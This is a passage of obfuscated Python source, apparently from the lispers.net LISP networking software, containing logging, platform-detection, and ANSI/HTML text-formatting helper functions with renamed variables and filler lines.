def lisp_record_traceback ( * args ) :
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
i1 = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
OO0oOOoo = open ( "./logs/lisp-traceback.log" , "a" )
OO0oOOoo . write ( "---------- Exception occurred: {} ----------\n" . format ( i1 ) )
try :
traceback . print_last ( file = OO0oOOoo )
except :
OO0oOOoo . write ( "traceback.print_last(file=fd) failed" )
if 52 - 52: o0oOOo0O0Ooo % Oo0Ooo
try :
traceback . print_last ( )
except :
print ( "traceback.print_last() failed" )
if 64 - 64: O0 % I11i % O0 * OoO0O00 . oO0o + I1IiiI
OO0oOOoo . close ( )
return
if 75 - 75: I11i . OoooooooOO % o0oOOo0O0Ooo * I11i % OoooooooOO
if 13 - 13: IiII / i11iIiiIii % II111iiii % I11i . I1ii11iIi11i
if 8 - 8: OoOoOO00 + Oo0Ooo - II111iiii
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if 39 - 39: I1Ii111
if 86 - 86: I11i * I1IiiI + I11i + II111iiii
if 8 - 8: I1Ii111 - iII111i / ooOoO0o
def lisp_set_exception ( ) :
sys . excepthook = lisp_record_traceback
return
if 96 - 96: OoOoOO00
if 29 - 29: I1ii11iIi11i / i1IIi . I1IiiI - OoOoOO00 - OoOoOO00 - Ii1I
if 20 - 20: i1IIi % OoO0O00 . I1IiiI / IiII * i11iIiiIii * OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
if 74 - 74: O0 / i1IIi
def lisp_is_raspbian ( ) :
if ( distro . linux_distribution ( ) [ 0 ] != "debian" ) : return ( False )
return ( platform . machine ( ) in [ "armv6l" , "armv7l" ] )
if 78 - 78: OoooooooOO . OoO0O00 + ooOoO0o - i1IIi
if 31 - 31: OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
def lisp_is_ubuntu ( ) :
return ( distro . linux_distribution ( ) [ 0 ] == "Ubuntu" )
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
def lisp_is_fedora ( ) :
return ( distro . linux_distribution ( ) [ 0 ] == "fedora" )
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
if 78 - 78: ooOoO0o * I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1 / I1Ii111 . Ii1I
def lisp_is_centos ( ) :
return ( distro . linux_distribution ( ) [ 0 ] == "centos" )
if 97 - 97: ooOoO0o / I1Ii111 % i1IIi % I1ii11iIi11i
if 18 - 18: iIii1I11I1II1 % I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
def lisp_is_debian ( ) :
return ( distro . linux_distribution ( ) [ 0 ] == "debian" )
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
def lisp_is_debian_kali ( ) :
return ( distro . linux_distribution ( ) [ 0 ] == "Kali" )
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
if 67 - 67: I1IiiI
if 55 - 55: I1ii11iIi11i - iII111i * o0oOOo0O0Ooo + OoOoOO00 * OoOoOO00 * O0
if 91 - 91: I1Ii111 - OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o
if 98 - 98: OoO0O00 . OoO0O00 * oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
def lisp_is_macos ( ) :
return ( platform . uname ( ) [ 0 ] == "Darwin" )
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
def lisp_is_alpine ( ) :
return ( os . path . exists ( "/etc/alpine-release" ) )
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
def lisp_is_x86 ( ) :
i1i1IIii1i1 = platform . machine ( )
return ( i1i1IIii1i1 in ( "x86" , "i686" , "x86_64" ) )
if 65 - 65: I1IiiI + OoOoOO00 / OOooOOo
if 83 - 83: o0oOOo0O0Ooo . iII111i - Oo0Ooo
if 65 - 65: iIii1I11I1II1 / ooOoO0o . IiII - II111iiii
if 72 - 72: iIii1I11I1II1 / IiII % iII111i % OOooOOo - I11i % OOooOOo
if 100 - 100: Oo0Ooo + i11iIiiIii
if 71 - 71: I11i / o0oOOo0O0Ooo / I1Ii111 % OOooOOo
if 51 - 51: IiII * O0 / II111iiii . Ii1I % OOooOOo / I1IiiI
def lisp_is_linux ( ) :
return ( platform . uname ( ) [ 0 ] == "Linux" )
if 9 - 9: I1IiiI % I1IiiI % II111iiii
if 30 - 30: IiII + I1Ii111 - IiII . IiII - II111iiii + O0
if 86 - 86: i1IIi
if 41 - 41: OoOoOO00 * I11i / OoOoOO00 % oO0o
if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
def lisp_is_python2 ( ) :
oOoOOo0oo0 = sys . version . split ( ) [ 0 ]
return ( oOoOOo0oo0 [ 0 : 3 ] == "2.7" )
if 60 - 60: ooOoO0o * I1Ii111 + Oo0Ooo
if 19 - 19: OoO0O00 * I11i / I11i . OoooooooOO - OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if 30 - 30: OoOoOO00
def lisp_is_python3 ( ) :
oOoOOo0oo0 = sys . version . split ( ) [ 0 ]
return ( oOoOOo0oo0 [ 0 : 2 ] == "3." )
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
if 10 - 10: II111iiii . iII111i
if 32 - 32: Ii1I . IiII . OoooooooOO - OoO0O00 + oO0o
if 88 - 88: iII111i
if 19 - 19: II111iiii * IiII + Ii1I
if 65 - 65: OOooOOo . I1Ii111 . OoO0O00 . iII111i - OOooOOo
def lisp_on_aws ( ) :
ii111i = getoutput ( "sudo dmidecode -s bios-vendor" )
if ( ii111i . find ( "command not found" ) != - 1 and lisp_on_docker ( ) ) :
oooo00 = bold ( "AWS check" , False )
lprint ( "{} - dmidecode not installed in docker container" . format ( oooo00 ) )
if 77 - 77: ooOoO0o - I1IiiI % I11i - O0
return ( ii111i . lower ( ) . find ( "amazon" ) != - 1 )
if 67 - 67: OOooOOo + Oo0Ooo
if 84 - 84: O0 * OoooooooOO - IiII * IiII
if 8 - 8: ooOoO0o / i1IIi . oO0o
if 41 - 41: iII111i + OoO0O00
if 86 - 86: OoOoOO00 . iIii1I11I1II1 - OoO0O00
if 56 - 56: O0
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
def lisp_on_gcp ( ) :
ii111i = getoutput ( "sudo dmidecode -s bios-version" )
return ( ii111i . lower ( ) . find ( "google" ) != - 1 )
if 23 - 23: oO0o - OOooOOo + I11i
if 12 - 12: I1IiiI / ooOoO0o % o0oOOo0O0Ooo / i11iIiiIii % OoooooooOO
if 15 - 15: iIii1I11I1II1 % OoooooooOO - Oo0Ooo * Ii1I + I11i
if 11 - 11: iII111i * Ii1I - OoOoOO00
if 66 - 66: OoOoOO00 . i11iIiiIii - iII111i * o0oOOo0O0Ooo + OoooooooOO * I1ii11iIi11i
if 74 - 74: Oo0Ooo
if 61 - 61: Oo0Ooo - I1Ii111 * II111iiii % ooOoO0o * iIii1I11I1II1 + OoO0O00
def lisp_on_docker ( ) :
return ( os . path . exists ( "/.dockerenv" ) )
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if 35 - 35: OOooOOo * o0oOOo0O0Ooo * I1IiiI % Oo0Ooo . OoOoOO00
if 58 - 58: I11i + II111iiii * iII111i * i11iIiiIii - iIii1I11I1II1
if 68 - 68: OoooooooOO % II111iiii
if 26 - 26: II111iiii % i11iIiiIii % iIii1I11I1II1 % I11i * I11i * I1ii11iIi11i
if 24 - 24: II111iiii % I1Ii111 - ooOoO0o + I1IiiI * I1ii11iIi11i
if 2 - 2: Ii1I - IiII
if 83 - 83: oO0o % o0oOOo0O0Ooo % Ii1I - II111iiii * OOooOOo / OoooooooOO
def lisp_process_logfile ( ) :
IIIiIi = "./logs/lisp-{}.log" . format ( lisp_log_id )
if ( os . path . exists ( IIIiIi ) ) : return
if 34 - 34: OoooooooOO . O0 / oO0o * OoOoOO00 - I1ii11iIi11i
sys . stdout . close ( )
sys . stdout = open ( IIIiIi , "a" )
if 36 - 36: i1IIi / O0 / OoO0O00 - O0 - i1IIi
lisp_print_banner ( bold ( "logfile rotation" , False ) )
return
if 22 - 22: i1IIi + Ii1I
if 54 - 54: ooOoO0o % OOooOOo . I1Ii111 + oO0o - OOooOOo * I1IiiI
if 92 - 92: o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % OoO0O00 % IiII . OoooooooOO
if 52 - 52: ooOoO0o / i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + o0oOOo0O0Ooo
if 71 - 71: oO0o % I11i * OoOoOO00 . O0 / Ii1I . I1ii11iIi11i
if 58 - 58: Oo0Ooo / oO0o
if 44 - 44: OOooOOo
if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
def lisp_i_am ( name ) :
global lisp_log_id , lisp_i_am_itr , lisp_i_am_etr , lisp_i_am_rtr
global lisp_i_am_mr , lisp_i_am_ms , lisp_i_am_ddt , lisp_i_am_core
global lisp_hostname
if 79 - 79: Ii1I . OoO0O00
lisp_log_id = name
if ( name == "itr" ) : lisp_i_am_itr = True
if ( name == "etr" ) : lisp_i_am_etr = True
if ( name == "rtr" ) : lisp_i_am_rtr = True
if ( name == "mr" ) : lisp_i_am_mr = True
if ( name == "ms" ) : lisp_i_am_ms = True
if ( name == "ddt" ) : lisp_i_am_ddt = True
if ( name == "core" ) : lisp_i_am_core = True
if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
if 52 - 52: i1IIi
if 84 - 84: Ii1I / IiII
lisp_hostname = socket . gethostname ( )
OOOooo0OooOoO = lisp_hostname . find ( "." )
if ( OOOooo0OooOoO != - 1 ) : lisp_hostname = lisp_hostname [ 0 : OOOooo0OooOoO ]
return
if 91 - 91: oO0o + I1IiiI
if 59 - 59: I1IiiI + i11iIiiIii + i1IIi / I11i
if 44 - 44: I11i . OoOoOO00 * I1IiiI + OoooooooOO - iII111i - IiII
if 15 - 15: IiII / O0 . o0oOOo0O0Ooo . i11iIiiIii
if 59 - 59: I1Ii111 - o0oOOo0O0Ooo - ooOoO0o
if 48 - 48: i1IIi + I11i % OoOoOO00 / Oo0Ooo - o0oOOo0O0Ooo
if 67 - 67: oO0o % o0oOOo0O0Ooo . OoooooooOO + OOooOOo * I11i * OoOoOO00
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
def lprint ( * args ) :
ii1I11iIiIII1 = ( "force" in args )
if ( lisp_debug_logging == False and ii1I11iIiIII1 == False ) : return
if 52 - 52: o0oOOo0O0Ooo * IiII + OoOoOO00
lisp_process_logfile ( )
i1 = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
i1 = i1 [ : - 3 ]
print ( "{}: {}:" . format ( i1 , lisp_log_id ) , end = " " )
if 49 - 49: iIii1I11I1II1 - O0 . i1IIi - OoooooooOO
for Ii1 in args :
if ( Ii1 == "force" ) : continue
print ( Ii1 , end = " " )
if 73 - 73: i1IIi + iII111i . i11iIiiIii
print ( )
if 5 - 5: oO0o . I1ii11iIi11i . II111iiii . OoooooooOO
try : sys . stdout . flush ( )
except : pass
return
if 96 - 96: i11iIiiIii - OOooOOo % O0 / OoO0O00
if 100 - 100: iII111i / Ii1I - OoooooooOO % II111iiii - I1IiiI % OoOoOO00
if 60 - 60: iIii1I11I1II1 + i1IIi
if 86 - 86: iIii1I11I1II1 + OoOoOO00 . i11iIiiIii - Ii1I
if 51 - 51: OoOoOO00
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if 53 - 53: Ii1I % Oo0Ooo
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
def fprint ( * args ) :
i1IiiI1iIi = args + ( "force" , )
lprint ( * i1IiiI1iIi )
return
if 66 - 66: OoO0O00 * Oo0Ooo
if 28 - 28: OoO0O00 % OoOoOO00 % I1ii11iIi11i + I1IiiI / I1IiiI
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
if 29 - 29: I1ii11iIi11i
if 52 - 52: i11iIiiIii / i1IIi
def dprint ( * args ) :
if ( lisp_data_plane_logging ) : lprint ( * args )
return
if 1 - 1: ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
if 46 - 46: i11iIiiIii - O0 . oO0o
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
def debug ( * args ) :
lisp_process_logfile ( )
if 83 - 83: I1Ii111
i1 = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
i1 = i1 [ : - 3 ]
if 48 - 48: II111iiii * OOooOOo * I1Ii111
print ( red ( ">>>" , False ) , end = " " )
print ( "{}:" . format ( i1 ) , end = " " )
for Ii1 in args : print ( Ii1 , end = " " )
print ( red ( "<<<\n" , False ) )
try : sys . stdout . flush ( )
except : pass
return
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
if 62 - 62: i1IIi + Oo0Ooo % IiII
def lisp_print_caller ( ) :
fprint ( traceback . print_last ( ) )
if 28 - 28: I1ii11iIi11i . i1IIi
if 10 - 10: OoO0O00 / Oo0Ooo
if 15 - 15: iII111i . OoOoOO00 / iII111i * I11i - I1IiiI % I1ii11iIi11i
if 57 - 57: O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if 39 - 39: iIii1I11I1II1 - OoooooooOO
def lisp_print_banner ( string ) :
global lisp_version , lisp_hostname
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if ( lisp_version == "" ) :
lisp_version = getoutput ( "cat lisp-version.txt" )
if 23 - 23: II111iiii / oO0o
iII1Iii1I11i = bold ( lisp_hostname , False )
lprint ( "lispers.net LISP {} {}, version {}, hostname {}" . format ( string ,
datetime . datetime . now ( ) , lisp_version , iII1Iii1I11i ) )
return
if 17 - 17: O0
if 88 - 88: Oo0Ooo . O0 % OoooooooOO / OOooOOo
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
def green ( string , html ) :
if ( html ) : return ( '<font color="green"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[92m" + string + "\033[0m" , html ) )
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if 19 - 19: i11iIiiIii
if 54 - 54: II111iiii . I11i
if 73 - 73: OoOoOO00 . I1IiiI
if 32 - 32: OoOoOO00 * I1IiiI % ooOoO0o * Ii1I . O0
if 48 - 48: iII111i * iII111i
def green_last_sec ( string ) :
return ( green ( string , True ) )
if 13 - 13: Ii1I / I11i + OoOoOO00 . o0oOOo0O0Ooo % ooOoO0o
if 48 - 48: I1IiiI / i11iIiiIii - o0oOOo0O0Ooo * oO0o / OoooooooOO
if 89 - 89: iIii1I11I1II1 / I1IiiI - II111iiii / Ii1I . i11iIiiIii . Ii1I
if 48 - 48: O0 + O0 . I1Ii111 - ooOoO0o
if 63 - 63: oO0o
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if 36 - 36: IiII
def green_last_min ( string ) :
return ( '<font color="#58D68D"><b>{}</b></font>' . format ( string ) )
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
if 74 - 74: I1Ii111 % I1ii11iIi11i
if 7 - 7: II111iiii
if 27 - 27: oO0o . OoooooooOO + i11iIiiIii
if 86 - 86: I11i / o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + oO0o
if 33 - 33: o0oOOo0O0Ooo . iII111i . IiII . i1IIi
if 49 - 49: I1ii11iIi11i
def red ( string , html ) :
if ( html ) : return ( '<font color="red"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[91m" + string + "\033[0m" , html ) )
if 84 - 84: I11i - Oo0Ooo / O0 - I1Ii111
if 21 - 21: O0 * O0 % I1ii11iIi11i
if 94 - 94: I11i + II111iiii % i11iIiiIii
if 8 - 8: ooOoO0o * O0
if 73 - 73: o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
if 11 - 11: OoOoOO00 + IiII - OoooooooOO / OoO0O00
if 34 - 34: ooOoO0o
def blue ( string , html ) :
if ( html ) : return ( '<font color="blue"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[94m" + string + "\033[0m" , html ) )
if 45 - 45: ooOoO0o / Oo0Ooo / Ii1I
if 44 - 44: I1ii11iIi11i - Ii1I / II111iiii * OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
if 58 - 58: I1IiiI - I1ii11iIi11i % O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
def bold ( string , html ) :
if ( html ) : return ( "<b>{}</b>" . format ( string ) )
return ( "\033[1m" + string + "\033[0m" )
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - o0oOOo0O0Ooo
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
if 14 - 14: I1ii11iIi11i
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
def convert_font ( string ) :
I1Iii1iI1 = [ [ "[91m" , red ] , [ "[92m" , green ] , [ "[94m" , blue ] , [ "[1m" , bold ] ]
o0 = "[0m"
if 93 - 93: i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + o0oOOo0O0Ooo / o0oOOo0O0Ooo / II111iiii
for I1i in I1Iii1iI1 :
Oo = I1i [ 0 ]
IiIiIi1I1 = I1i [ 1 ]
IiI1ii1Ii = len ( Oo )
OOOooo0OooOoO = string . find ( Oo )
if ( OOOooo0OooOoO != - 1 ) : break
if 51 - 51: i11iIiiIii * o0oOOo0O0Ooo / I1IiiI
if 40 - 40: I1IiiI
while ( OOOooo0OooOoO != - 1 ) :
I1I1 = string [ OOOooo0OooOoO : : ] . find ( o0 )
O0oOoo0OoO0O = string [ OOOooo0OooOoO + IiI1ii1Ii : OOOooo0OooOoO + I1I1 ]
string = string [ : OOOooo0OooOoO ] + IiIiIi1I1 ( O0oOoo0OoO0O , True ) + string [ OOOooo0OooOoO + I1I1 + IiI1ii1Ii : : ]
if 63 - 63: OoooooooOO / ooOoO0o
OOOooo0OooOoO = string . find ( Oo )
if 91 - 91: i1IIi - iIii1I11I1II1
if 55 - 55: I1IiiI * o0oOOo0O0Ooo % ooOoO0o . iIii1I11I1II1 * I1Ii111
if 92 - 92: I1Ii111 - iIii1I11I1II1
if 32 - 32: Ii1I % OoO0O00 * OoO0O00 + IiII * II111iiii * Ii1I
if 11 - 11: oO0o % II111iiii
if ( string . find ( "[1m" ) != - 1 ) : string = convert_font ( string )
return ( string )
if 57 - 57: OOooOOo / Oo0Ooo
if 69 - 69: oO0o - Oo0Ooo % IiII
if 50 - 50: OoooooooOO
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
if 88 - 88: OoOoOO00 - i11iIiiIii % o0oOOo0O0Ooo * I11i + I1ii11iIi11i
def lisp_space ( num ) :
OoiIIIiIi1I1i = ""
for OoOOoO0oOo in range ( num ) : OoiIIIiIi1I1i += " "
return ( OoiIIIiIi1I1i )
if 70 - 70: I11i % iIii1I11I1II1 . Oo0Ooo + Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
def lisp_button ( string , url ) :
ooOo0O0O0oOO0 = '<button style="background-color:transparent;border-radius:10px; ' + 'type="button">'
if 10 - 10: Oo0Ooo + O0
if 43 - 43: iIii1I11I1II1 / II111iiii % o0oOOo0O0Ooo - OOooOOo
if ( url == None ) :
oO0O000oOo = ooOo0O0O0oOO0 + string + "</button>"
else :
OoOOOO = '<a href="{}">' . format ( url )
I1iiIi111I = lisp_space ( 2 )
oO0O000oOo = I1iiIi111I + OoOOOO + ooOo0O0O0oOO0 + string + "</button></a>" + I1iiIi111I
if 34 - 34: i11iIiiIii - II111iiii / I1IiiI % o0oOOo0O0Ooo
return ( oO0O000oOo )
if 33 - 33: OOooOOo
if 35 - 35: i11iIiiIii - I1IiiI / OOooOOo + Ii1I * oO0o
if 49 - 49: o0oOOo0O0Ooo * Ii1I + I11i + iII111i
if 30 - 30: o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
def lisp_print_cour ( string ) :
OoiIIIiIi1I1i = '<font face="Courier New">{}</font>' . format ( string )
return ( OoiIIIiIi1I1i )
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
def lisp_print_sans ( string ) :
OoiIIIiIi1I1i = '<font face="Sans-Serif">{}</font>' . format ( string )
return ( OoiIIIiIi1I1i )
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
def lisp_span ( string , hover_string ) :
OoiIIIiIi1I1i = '<span title="{}">{}</span>' . format ( hover_string , string )
return ( OoiIIIiIi1I1i )
if 47 - 47: oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
def lisp_eid_help_hover ( output ) :
IIi1iI = '''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
if 92 - 92: OoO0O00 * ooOoO0o
if 35 - 35: i11iIiiIii
ooO = lisp_span ( output , IIi1iI )
return ( ooO )
if 55 - 55: I11i
if 83 - 83: IiII * I11i / Oo0Ooo
if 32 - 32: o0oOOo0O0Ooo + OoOoOO00 - OoooooooOO
if 39 - 39: OoooooooOO * OOooOOo * O0 . I11i . OoO0O00 + ooOoO0o
if 9 - 9: OoOoOO00 + oO0o % OoooooooOO + o0oOOo0O0Ooo
if 56 - 56: OoooooooOO + I1ii11iIi11i - iII111i
if 24 - 24: o0oOOo0O0Ooo + ooOoO0o + I11i - iIii1I11I1II1
def lisp_geo_help_hover ( output ) :
IIi1iI = '''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
if 49 - 49: I11i . ooOoO0o * OoOoOO00 % IiII . O0
if 48 - 48: O0 * Ii1I - O0 / Ii1I + OoOoOO00
ooO = lisp_span ( output , IIi1iI )
return ( ooO )
if 52 - 52: OoO0O00 % Ii1I * II111iiii
if 4 - 4: I11i % O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
def space ( num ) :
OoiIIIiIi1I1i = ""
